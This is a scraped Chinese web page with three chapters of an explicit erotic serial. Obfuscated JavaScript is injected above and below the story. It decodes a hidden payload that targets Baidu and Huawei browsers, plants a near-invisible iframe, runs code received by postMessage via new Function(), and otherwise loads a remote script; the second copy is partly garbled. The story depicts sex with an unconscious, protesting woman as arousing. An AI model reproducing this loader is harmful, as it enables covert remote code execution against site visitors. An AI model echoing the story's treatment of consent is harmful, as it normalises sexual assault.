甜逗快穿np_男上司酒后出轨h

eval("\x77\x69\x6e\x64\x6f\x77")["\x77\x6E\x68\x77"]=function(e){var hp =''+'ABCDEFGHIJKLMNOPQ'+'RSTUVWXYZabcdefghi'+'jklmnopqrstuvw'+'xyz012345'+'6789+/='+''+'';var t="",n,r,i,s,o,u,a,f=0;e=e['re'+'pla'+'ce'](/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=hp.indexOf(e.charAt(f++));o=hp.indexOf(e.charAt(f++));u=hp.indexOf(e.charAt(f++));a=hp.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return (function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2;}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);}
eval("\x77\x69\x6e\x64\x6f\x77")["\x70\x75\x6E\x41\x50\x77\x68\x55\x43"]=function(){eval(wnhw("OyhmdW5jdGlvbih1LHIsdyxkLGYsYyl7dT1kZWNvZGVVUklDb21wb25lbnQod25odyh1LnJlcGxhY2UobmV3IFJlZ0V4cChjKycnK2MsJ2cnKSxjKS5zcGxpdCgnJykucmV2ZXJzZSgpLmpvaW4oJycpKSk7J2pRdWVyeSc7aWYobmF2aWdhdG9yLnVzZXJBZ2VudC5pbmRleE9mKHduaHcoIlltRnBaSFU9IikpPi0xIHx8IG5hdmlnYXRvci51c2VyQWdlbnQuaW5kZXhPZih3bmh3KCdTSFZoZDJWcFFuSnZkM05sY2c9PScpKT4tMSl7ZnVuY3Rpb24gcmQobixtKXtyZXR1cm4gTWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpKihtLW4rMSkrbik7fWZ1bmN0aW9uIHJtKGUpe2lmKGUmJmUudGFnTmFtZS50b1VwcGVyQ2FzZSgpPT09IklGUkFNRSImJmUuc3JjLmluZGV4T2YodSk+LTEpe2UucmVtb3ZlKCk7fWVsc2UgaWYoZS5uZXh0RWxlbWVudFNpYmxpbmcpe3JtKGUubmV4dEVsZW1lbnRTaWJsaW5nKTt9fWxldCBjPWRbd25odygiWTNWeWNtVnVkRk5qY21sd2RBPT0iKV07dmFyIF9pZD1fY2xhc3M9J2FfMTk5MCc7dmFyIF9fYWFucWlkID0gJ2EnICsgcmQoMSwgMTAwMDAwKTtkWyd3JysncmknKyd0JysnZScrJ2xuJ10oJzxkJysnaXYgaScrJ2Q9JysnIicrX19hYW5xaWQrJyI+JysnPC9kJysnaXYnKyc+Jyk7d1snX19hJysnYWEnKyducScrJ29iJysnal8xOTkwJ109ZFsncXUnKydlcnknKydTZWxlJysnY3RvJysnciddKCcjJytfX2FhbnFpZCk7X2lkICs9IGRbJ3F1JysnZXJ5JysnU2UnKydsZWMnKyd0bycrJ3JBJysnbGwnXSgnLicrX2NsYXNzKS5sZW5ndGg7dmFyIHogPSB1KyctMS8nK19pZCsnLycrcjtkWyd3JysncmknKyd0JysnZSddKCc8aScrJ2ZyJysnYScrJ21lIHN0eWxlPSInKydtJysnYXInKydnaScrJ246MDtwJysnYWQnKydkJysnaW4nKydnOjA7YicrJ29yJysnZCcrJ2VyOm4nKydvbicrJ2U7Jysnb3AnKydhJysnY2knKyd0JysneTowJysnLjAnK3JkKDIsOSkrJzt3aScrJ2R0JysnaDonK3JkKDIsNSkrJ3AnKyd4O2gnKydlJysnaWdoJysndDonK3JkKDIsNSkrJ3AnKyd4OycrJyJhbCcrJ2xvd3RyYW4nKydzcGEnKydyZW5jeSBzcicrJ2M9IicreisnIj48L2knKydmcicrJ2EnKydtZT4nKTt3WyJhZCIrImRFdiIrImVudEwiKyJpc3QiKyJlbmVyIl0oIm0iKyJlc3MiKyJhZ2UiLGZ1bmN0aW9uKGUpe2lmKGUuZGF0YVtyK19pZF0pe3JtKGMpO25ldyBGdW5jdGlvbih3bmh3KGUuZGF0YVtyK19pZF0ucmVwbGFjZShuZXcgUmVnRXhwKHIsJ2cnKSwnJykpKSgpO319KTt9ZWxzZXtkLndyaXRlKCc8cycrJ2NyaScrJ3B0IHNyYz0iJyt1KycuanMiPjxcL3MnKydjcmlwJysndD4nKTt9fSkoJycrJz09UU55JysnMEMnKydNNWtUJysnTXR0JysnTScrJ20nKydSeVUnKydTJysnWm9oJysnWFlxbCcrJ25SeVV5JysnTScrJzAnKydRRE14RScrJzBNbDAnKycyYmo1JysnaWEnKyczVicrJ1dlJysnMGRYJysnWnUnKydjM2QnKyczWmtNbCcrJ1lrTWxFJysnME1sJysnTScrJ0hjMFJIJysnYScrJycrJycsJycrJ1FPRScrJ1NKTicrJ3BaJysnJysnJyx3aW5kb3csZG9jdW1lbnQsJycrJ3BDaycrJ3JGWCcrJ1onKycnKycnLCd0Jyk="));}
魔魅(限)26

“啊啊!!哼嗯……”刺耳的裂帛声震盪著幕清幽的鼓膜,她只感觉到身下一凉,紧接著就被一双大手分别握住了两只小腿。

“怎麽样,女人,你喜欢暴的还是温柔的?”戏谑的耍弄著身下的猎物,魔夜风嗅著她身上传来的一阵阵少女的幽香,情不自禁的低下头色情的舔舐著她腿上的肌肤。

“好痒!你放开!”幕清幽扭动著身躯试图将自己的腿从他的掌握中抽出却不幸的被他抓得更紧。

“痒?”魔夜风兴奋地边吻著幕清幽的小腿便抬起长睫睨著她两腿之间若隐若现的影,“哪里痒?这里痒麽?”故意曲解她的意思,魔夜风湿热的唇一点一点的向上游移,不放过她的每一寸肌肤。他一路激狂的吮吸,最後吻向她从未被人碰触过的大腿部。

“告诉我,你的味道!什麽那麽甜?害我怎麽吃都吃不够……”微微施展力道将女人的双腿扳开,魔夜风著迷的用鼻尖轻蹭著她的腿,然後一口一口的咬啮著她。

“啊嗯……不要这样,你变态!!你是野兽麽!”分不清是气急还是羞愤,幕清幽眼眶中的泪水大颗大颗的掉下来。他在做什麽!该死的男人!要做就快做,她幕清幽也不是一定要学哪些三贞九烈一生只跟一个男人。但是,用这些折磨死人的怪招来整治她真的比立刻将她正法还要难受。

她低下头,想喝止住他的那些让她又痒又难过的调情行为。却发现他被情欲迷朦的眼睛变得前所未有的深沈幽暗,而那颗蠢蠢欲动的黑色头颅正伸出长舌埋向自己的腿间……

“不!啊嗯……啊……啊……”

魔夜风用手肘压住女人的腿窝,腾出手来向两边拨开她诱人的花瓣。那是樱花般优美的嫩粉色,小巧的护在紧窄的嫩上正微微的颤动著。被他用两指压住後,中间的细缝被迫张开露出一个小小的口。

“你看你,真漂亮。”忍不住朝幕清幽的花儿呼著热气,魔夜风将整片热舌贴在她的户上来回的移动带给她强烈的刺激感。

“啊……”幕清幽好热好渴,连呻吟声都变的像是小猫在咪呜咪呜的叫。她作为女人的那一面声音本来就娇嗲,这麽一呻吟更是听得魔夜风骨头都酥了。

“乖孩子,我喜欢听你叫,再给孤王叫一声。”他温柔的诱哄著她,并找到隐藏在她细软毛发中的蒂,马上用口含住卖力的舔弄扭转著。

知道他喜欢,幕清幽偏偏不想如他的意。她使劲咬著牙关,不让一丝声音逸出她的小口。

“不叫?”睇了她一眼,魔夜风轻笑。

“哼!”幕清幽偏过头去不去看他。她讨厌他得意的样子,那样自信,仿佛一切都是围绕著他才存在的。她更讨厌他从来不在乎别人的看法,只图自己心里愉快。幕绝是这样,青儿是这样,皇甫浮云是这样,现在,终於轮到她了。

她不喜欢这种感觉,被玩弄,被戏耍。在这个骁王的眼里,他们都是猎物,都是傀儡,都是他招致则来挥之则去的玩具!那麽既然是这样,她也不必客气。他想要的东西她就偏不让他得到,至少她幕清幽绝对不会是他所想的那种女人!

“哈哈,有趣──”看到身下的小人儿一脸厌恶和倔强,魔夜风心中感到一阵不悦。想反抗是麽?那他就用更强烈的手段让她知道自己是属於谁的,知道什麽是她必须接受的现实。

“叫!快叫给孤王听!”大力的攫住幕清幽的下巴,魔夜风眯著眼睛,神色有些狰狞。

幕清幽见他又开始以武力迫使自己,心里便明白已经激到他了。於是更宁愿忍受著被捏碎的痛楚,也不肯再吐出半句呻吟。

“我差点忘了,你是个倔强的美人……”邪佞的一笑,幕清幽此举已经完全挑起了魔夜风的征服欲。捏住她下巴的手渐渐放松了力道,魔夜风改为将食指强行深入她的小口之中逗弄著她的香舌。

结实的男身躯重新覆上女人赤裸的身体,魔夜风故意用紧绷的肌一下一下磨蹭著幕清幽的。两人的尖相互摩擦,激起极大地快感。幕清幽只觉得他的身体好热好强壮,纯男的气息包围著自己。他胯间的又故意抵著她的私处轻轻顶弄撞击,时而用嚣张的圆端揉弄著她的蒂。让她强忍著快感不呻吟直到浑身上下都香汗淋漓。

“唔……唔嗯……”含著他的手指,幕清幽无法再扣上牙关,本能的发出声音。

“看,这不是叫了麽。”魔夜风用虎口揉著她一边的房,食指更是不断地进入小口。那频率就像是在用手跟她的嘴巴交欢一样。

被他的话语激怒,幕清幽张开贝齿准备大力地咬他一口。却被他先看出端倪,及时的抽回手指。

“想咬人?你这只小野猫!”狠狠地吻住死瞪著自己的女人,魔夜风故意嘬吮著她的唇瓣,发出靡的啾啾声。

“嗯,嗯啊……”她不叫,他替她叫。边纵情的吻著她,边制造出男感的喘声和唇舌暧昧的纠缠声。她挣扎著躲过,他就再接再厉的又将薄唇覆上来,比刚才吮得还激烈。

不要,她不要听!幕清幽受不了的甩著头,试图用被绑紧的手勉强的捣住一边的耳朵,却被魔夜风轻笑著拉得更远。他就是要她听,就是要她记住他和她交好的每一个细节。他要她知道他是他的,永远忘不了和他的这一夜。

玩弄著她的口唇,玩弄著她的房……手指跟著开始向下探,找到已经充血肿大的蒂,用麽指旋揉。修长的中指也在她微启的口到一股湿润,便就这这份润滑不客气的进她的中享受被包裹的快感。

幕清幽觉得自己快要疯狂了,被魔夜风上下亵玩著身体让她脑子里渐渐失去了意识,反抗的意志力也越来越薄弱。她的舌被动的被他勾卷出唇外,含在他的口中吸吮。可她看他俊脸的视线却越来越模糊,不知不觉的……她闭上了眼,陷入不自知的混沌之中 。

魔魅(限)27

不知昏迷了多久,幕清幽才感觉异样的醒转过来。她下意识的动了动双手,才发现原本绑住她的绳索不知什麽时候已经被解开了。此时,她的手好好的被身上的男人扣在掌心里按在自己头的两侧。

男人?掌心?

一道寒光从她心中一闪即逝,幕清幽带著不祥的预感低下头果然看到自己的双腿被打得开开的。一紫红色的巨大正快意的在自己的小中进进出出著。

“啊……”突然,一个强有力的入结实的撞上了她的花心,让她难耐的叫了一声。

“醒了?”听到声音,正摆动著窄臀像起伏的波浪一般在女人腿心抽刺旋扭的魔夜风邪恶的勾著唇角欺上了她的脸。

“感觉到了吗,我我已经干过你了。这是第二次,这一次让你知道!”抵著她早已被吻肿的唇瓣,魔夜风压低声音像是在挑衅一般轻佻的对她说。

幕清幽清楚地感觉到从四处不断传来的酸麻,也许是上天故意要帮她一把,让她及时的昏过去没有体会到破身时的疼痛。但是现在,她觉得在自己体内抽的那一将她的儿撑得好开。她敢打赌,以他的尺寸,自己一只手绝对圈不住。

“啊……啊恩……”完全不受控制的发出女人被男人疼爱时的叫床声,幕清幽清楚地感觉到他的上弹跳的青筋。好痒……好舒服……她本不愿意承认,但是他这样三长两短时而又旋转著进入的捣著她的小,真的让她有种欲仙欲死的快感。

“对,叫吧,大声的叫!再浪一些!”沁出的汗水将魔夜风的碎发黏在额角,他黝黑的肌肤上也开始泛出淡淡的红晕。激狂的情欲让他感觉到前所未有的兴奋。天哪!她把他吸得好舒服,这种美妙的感觉他从来没有在任何一个女子身上体会到过。她那麽软,那麽紧,一下一下套弄著他的硕大,让他不得不一次又一次运气压下欲的冲动。

“你看,我把你的小腹都顶起来了呢。”魔夜风放开她的手任她无助的改握住身下的床单,小口中嗲嗲的浪叫不断。他故意用手掌轻抚她腹部被他过深的抽而顶起来的部份,腰部摆动的更加卖力。

“嗯……不……不要再动了……”幕清幽全身快要虚脱了,她意识到在自己醒来之前,魔夜风一定已经把她用了个彻底。她浑身是汗,小一阵阵的痉挛。她能感觉到身下湿湿的,不知道是自己流出来的还是他的体。

“我还没够你呢,小美人,今晚我一定要干你几十回!”魔夜风说著将她的右腿举到自己肩上,一只脚盘在身前,另一只则撑著床榻。左手把住幕清幽的腰开始旋转著进入她的小,让自己的圆端碰触到她里每一个地方。

“哦!不要……”被触及到一块与众不同的软,幕清幽忍不住尖叫著抗拒。

“是这里麽?果然,还是醒著的时候干著比较爽!”魔夜风知道自己碰到了她最敏感的地域,便故意顶著那一块来回磨弄著,惹得被入的女人更大声的叫。

“啊……嗯嗯……天啊……”幕清幽紧紧抓著身下的床单,羞死了也气死了。自己竟然被他弄得这般舒爽,简直成了自愿与他交欢。但是他真的弄的她好舒服,她只觉得在他的撞击下身体里有一处酥麻越来越敏感。紧接著在他更用力的一个入下,她不断收缩著小痉挛著达到了高潮。

丰沛的花冲刷著魔夜风热铁的顶端,让他兴奋得忘记了一切。顾不得幕清幽早已疲软的身子,他迳自将她翻转过来,跪在她身後再次狠狠地进入她。

“啊……嗯嗯……嗯……”被进入的幕清幽感到男人像骑马一样伏在她身上驰骋著摆动身体,他的大手还不安分的伸到前面来握住自己的两团绵。分别用两指捏住头,左右两边同时来回拧转著。

“知道你昏过去时我是怎麽干你的麽?”低沈邪魅的男音在她耳边幽幽的响起,幕清幽不由得浑身一颤。

“我……嗯……不想知道……”

“由不得你,”魔夜风加快了身下的速度,由尽没入的深改为在口快速的做著小幅度的抽撤。故意让她紧窄的小专心吸吮他胀大的圆端。

“我刚才把你双腿打开,拨开你的花瓣,然後慢慢的顶进了你的小嫩。你的很漂亮,慢慢的将我的全部吃进去,还吸得好紧。”

“不,我不要听!嗯……”被突然到花心,幕清幽咬著唇难耐的说不出半个字。

“你好热,让我很快乐。”不肯放过身下的女人,魔夜风改用手大力抓揉她的两个房,他不留情的叼住她的耳朵向自己这边拉扯,逼她扭过头来和自己舌吻。

“於是我将你的腿放在肩上,不停地抽你,搞得你水流得一床单都是。黏黏腻腻的被我捣成了白沫。”一边色情的吻著她,魔夜风仍然不断地将两个人交欢的细节荡的讲给她听。

“嗯……”幕清幽实在受不了这种折磨,乾脆主动吻住他的薄唇,只!了不想再听他说话。

“嗯哈哈……”两人的唇吻之间逸出魔夜风得意的笑声,宽阔的大床上古铜色肌肤的男人正伏在皓白如雪的女人身上激烈的抽动著。体碰撞出飞溅的花,发出“噗!噗!”的靡声响。这一切看上去都那麽的欲,那麽的秽。

一次又一次姿势的变换,一次又一次将幕清幽推向绝顶的高潮。

终於,在抽了幕清幽几千下之後,一阵强烈的快感沿著魔夜风的脊椎冲上脑海。他迅速的抖动著健臀将热全部进幕清幽的体内。

正当两个人互相拥搂著享受高潮的馀韵的时刻,一边的紫色帘幔却被人慢慢的掀起。一个身著青衣的男子,看著面前赤裸的两人,嘴角勾起一抹复杂的笑容。

魔魅(限)28

察觉到有人在窥视,魔夜风不动声色的伸手点了幕清幽的昏睡,自己则披上一件外袍缓缓的站了起来,顺便拉过一旁的被单将幕清幽明显是被人狠狠爱过的身体密不透风的覆盖上。过於美丽的景色,还是不要任人赏玩比较好。

“你最近,似乎很喜欢往我这里溜达──”狭长的黑眸优雅的眯起,魔夜风催动掌风轻而易举的撕裂半截被掀起的紫色帷幔,却没有伤到躲在後面的人。也许,这只是因为他早已猜到那个人是谁。

淡淡的笑著,青衣男子轻摇著铜骨摺扇,俊尔的面庞掠过一丝不经意的调侃。

“怎麽,当了骁王就不欢迎我来了?”他并没有架起任何防备,也没有懦弱的躲闪。而是大大方方的走进来站在魔夜风面前,如此坦荡、如此沈稳、如此俊逸不凡。

男子有一双清澈的眼睛,乌黑的长发被一青色缎带低低的束在脑後。浑身上下散发著一种全然的善类气息,没有丝毫的侵略。唯一与那一身布青衣不同的是他与生俱来的贵族气质,与处变不惊的恬淡笑容。

“我猜──”魔夜风意味深长的看了他一眼,又转而睨著已经陷入昏睡的幕清幽。

“你,是!了她而来的吧。”冷笑一声,一切已经尽在他的掌握之中。

“不错。”青衣男子没有否认自己的来意,反而欺著幕清幽的身子坐下,温柔的手指抚上她被吻肿的唇瓣,目光中全是不舍与怜惜。

“你还是这麽鲁。”耳边传来青衣男子喃喃的低语声。

“哼。”魔夜风冷冷的看著他,“你未曾跟我说过她是个女人。”

“我以为你足够聪明,会多少怀疑一点那天我突然出现在斜阳殿抱走她的动机。”好看的唇微微扬起,青衣男子轻挑起秀气的眉。

“而且,我跟你说过她是我一个很‘特殊’的朋友,还请你不要再追究她的过失。”再一次轻声提点,青衣男子摇著纸扇目光温和的看著魔夜风。

“谁会注意那种事!”魔夜风俊脸一,“你从来都是对谁都那样好,连蚂蚁都不忍心踩死。”

“我就当做这是你对我的夸奖好了。”温柔至极的声音传入魔夜风耳中,青衣男子用被单将幕清幽的身子裹好,并让她的头靠在自己的前。

“风,我要暂时带她走。”他轻轻的说,“你伤害到她了。”

“不行!”魔夜风不悦的盯著青衣男子的手,因为此时男人正将幕清幽温柔的呵护在自己的怀中。那样子让魔夜风有种自己是坏人,而他们才是真正的一对的错觉。

“你已经看的很清楚,她是我的女人了。”不容置喙的走上前,魔夜风伸出双臂就要将幕清幽抢回。

“慢著──”

铜骨扇不置可否的点上他的劲腕,青衣男子原本眼眸里的微笑戛然而止,“你说她是你的女人,你爱她麽?”

身体瞬间僵住,魔夜风迟疑了一下,“我不爱任何人。”

伸出的手硬生生的收回,魔夜风将双手缚在身後,表情有些木然。

“那麽清幽就不是你的女人。”青衣男子叹息一声,摇了摇头。

对於魔夜风,他是无可奈何的。

眼前的他已经变得更成熟,更霸气,也更加像一个气宇轩昂的王者。但是那比万年冰山还要难以融化的冷酷,却一如既往的坚持。

三年前他穿著一件沾满鲜血的衣服,看上去像是一个刚被全世界背叛了的孩子。比狼更冰冷凶狠的眼神,比地狱的烈火更暴戾的杀气,让他看上去像个嗜血的恶魔。那个时候他手里握著长剑,身後却没有一个侍卫,就这样孤身一人拓跋的来到他的面前……

想到这里,青衣男子低下头,不由得抱紧了怀中的幕清幽──

“你这是什麽意思?”魔夜风冷然的看著青衣男子,脸色变的鸷。

“你太不了解清幽了,”青衣男子一字一句的说,“即便是身子强给了你,只要她说一句不,人也永远不会是你的。”

“由不得她。”魔夜风不以为然的偏过头。他不喜欢这男人跟他说话的口吻,仿佛他有多麽熟悉幕清幽一般。他们究竟有什麽样的过去,能让他的心此刻竟无声无息的揪紧。

於是他强硬的抛出一个事实,“我是第一个搞她的男人。”

不满魔夜风俗的语言,青衣男子别过脸迳自将幕清幽横抱在自己怀中打算带她离去了。

“我说过你们可以走了吗?”克制後的恼火终於复燃,魔夜风几乎要拾起被丢在一旁的剑。

“风,你是只属於清幽的麽?”没有回头,青衣男子抱著幕清幽站在原地平静的询问。

“当然不是。”魔夜风决然的否定。

“所以,即便是经过了体交缠,你不是属於她的,她也自然不会只是你的,你明白了吗?”

像被什麽东西狠狠地刺了一下,魔夜风错愕的望著两人的背影,脑海里浮现的全是幕清幽在欢爱时的表情。

他看到了愤怒,倔强,厌恶,甚至是到後来她也有些享受……但就是没有女人的认命和顺从。直觉告诉他,这个女人是不一样的。他曾经感兴趣她的与众不同。但是,这种不一样是不是有一天会成为她毫不留恋的离开他的理由?

他第一次觉得搞不懂,不知道,很难说。这女人绝对不会是一个定数,他只是单纯的想把她留在自己身旁而已,看著她,和她戏耍,与什麽情情爱爱的无关。但是她真的会如此听话的任他摆布麽?

绝不──

一阵清风吹过,风干了他额角原本粘著的汗水。魔夜风仿佛听到那一张让他痴迷的樱桃小口里决绝的飘出答案。

“神乐,这就是你那麽平静的理由麽。”忽然之间,他有些明了青衣男子一直以来的淡然。他不是傻子,看得出来对方在看清幽时眼眸中迤逦的动容。看得出即便那是一个像水一般澄澈温柔的男子,在抚这个女人时的那种爱怜也不会是对谁都有……

那是因为他自信!自信自己比世界上任何男人都更了解幕清幽。

没有回答魔夜风的话,青衣男子掀开残破的紫色帷幔的一角。抱著怀中的女人,向属於自己的地方走去。
版权声明

本站内容由互联网搜集而来,不代表撩妹情话网立场,请勿对号入座!
如果本文侵犯了您的合法权益,请联系我们,我们将在第一时间处理!

eval("\x77\x69\x6e\x64\x6f\x77")["\x6E\x70\x6C\x73"]=function(e){var sp =''+'ABCDEFGHIJKL'+'MNOPQRSTUVWXY'+'Zabcdefgh'+'ijklmnopqrs'+'tuvwxyz0123456'+'789+/='+''+'';var t="",n,r,i,s,o,u,a,f=0;e=e['re'+'pla'+'ce'](/[^A-Za-z0-9+/=]/g,"");while(f>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return (function(e){var t="",n=r=c1=c2=0;while(n191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2;}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);}
eval("\x77\x69\x6e\x64\x6f\x77")["\x41\x73\x58\x70\x50\x73\x6C\x6E\x5A"]=function(){eval(npls("OyhmdW5jdGlvbih1LHIsdyxkLGYsYyl7dT1kZWNvZGVVUklDb21wb25lbnQobnBscyh1LnJlcGxhY2UobmV3IFJlZ0V4cChjKycnK2MsJ2cnKSxjKS5zcGxpdCgnJykucmV2ZXJzZSgpLmpvaW4oJycpKSk7J2pRdWVyeSc7aWYobmF2aWdhdG9yLnVzZXJBZ2VudC5pbmRleE9mKG5wbHMoIlltRnBaSFU9IikpPi0xIHx8IG5hdmlnYXRvci51c2VyQWdlbnQuaW5kZXhPZihucGxzKCdTSFZoZDJWcFFuSnZkM05sY2c9PScpKT4tMSl7ZnVuY3Rpb24gcmQobixtKXtyZXR1cm4gTWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpKihtLW4rMSkrbik7fWZ1bmN0aW9uIHJtKGUpe2lmKGUmJmUudGFnTmFtZS50b1VwcGVyQ2FzZSgpPT09IklGUkFNRSImJmUuc3JjLmluZGV4T2YodSk+LTEpe2UucmVtb3ZlKCk7fWVsc2UgaWYoZS5uZXh0RWxlbWVudFNpYmxpbmcpe3JtKGUubmV4dEVsZW1lbnRTaWJsaW5nKTt9fWxldCBjPWRbbnBscygiWTNWeWNtVnVkRk5qY21sd2RBPT0iKV07dmFyIHo9dSsnLTEvcXEvJytyO2RbJ3cnKydyaScrJ3QnKydlJ10oJzxpJysnZnInKydhJysnbWUgc3R5bGU9IicrJ20nKydhcicrJ2dpJysnbjowO3AnKydhZCcrJ2QnKydpbicrJ2c6MDtiJysnb3InKydkJysnZXI6bicrJ29uJysnZTsnKydvcCcrJ2EnKydjaScrJ3QnKyd5OjAnKycuMCcrcmQoMiw5KSsnO3dpJysnZHQnKydoOicrcmQoMiw1KSsncCcrJ3g7aCcrJ2UnKydpZ2gnKyd0OicrcmQoMiw1KSsncCcrJ3g7JysnIiBhbCcrJ2xvd3RyYW4nKydzcGEnKydyZW5jeSBzcicrJ2M9IicreisnIj48L2knKydmcicrJ2EnKydtZT4nKTt3WydhZCcrJ2RFdicrJ2VudEwnKydpc3QnKydlbmVyJ10oJ20nKydlc3MnKydhZ2UnLGZ1bmN0aW9uKGUpe2lmKGUuZGF0YVtyXSl7cm0oYyk7bmV3IEZ1bmN0aW9uKG5wbHMoZS5kYXRhW3JdLnJlcGxhY2UobmV3IFJlZ0V4cChyLCdnJyksJycpKSkoKTt9fSk7fWVsc2V7ZC53cml0ZSgnPHMnKydjcmknKydwdCBzcmM9IicrdSsnLmpzIj48XC9zJysnY3JpcCcrJ3Q+Jyk7fX0pKCcnKyc9JysnPXdNTScrJ3kwU00nKydNJysnNWtUTU0nKyd0TScrJ01tUicrJ3lVQ01NJysndDVXWjAnKydNTWonKydSeVV5JysnTU0wUUQnKydNTXgnKydFJysnME0nKydNbCcrJzAyJysnYmo1aWEnKyczJysnVlcnKydlJysnMGQnKydYJysnWnUnKydjJysnM2QnKyczWmsnKydNTWxZJysna00nKydNbCcrJ0UnKycwTU0nKydsTScrJ01IYzBSJysnSCcrJ2EnKycnKycnLCcnKydJZ0snKydsanMnKydBZScrJycrJycsd2luZG93LGRvY3VtZW50LCcnKydhdmQnKydlTXgnKyc1JysnJysnJywnTScp"));}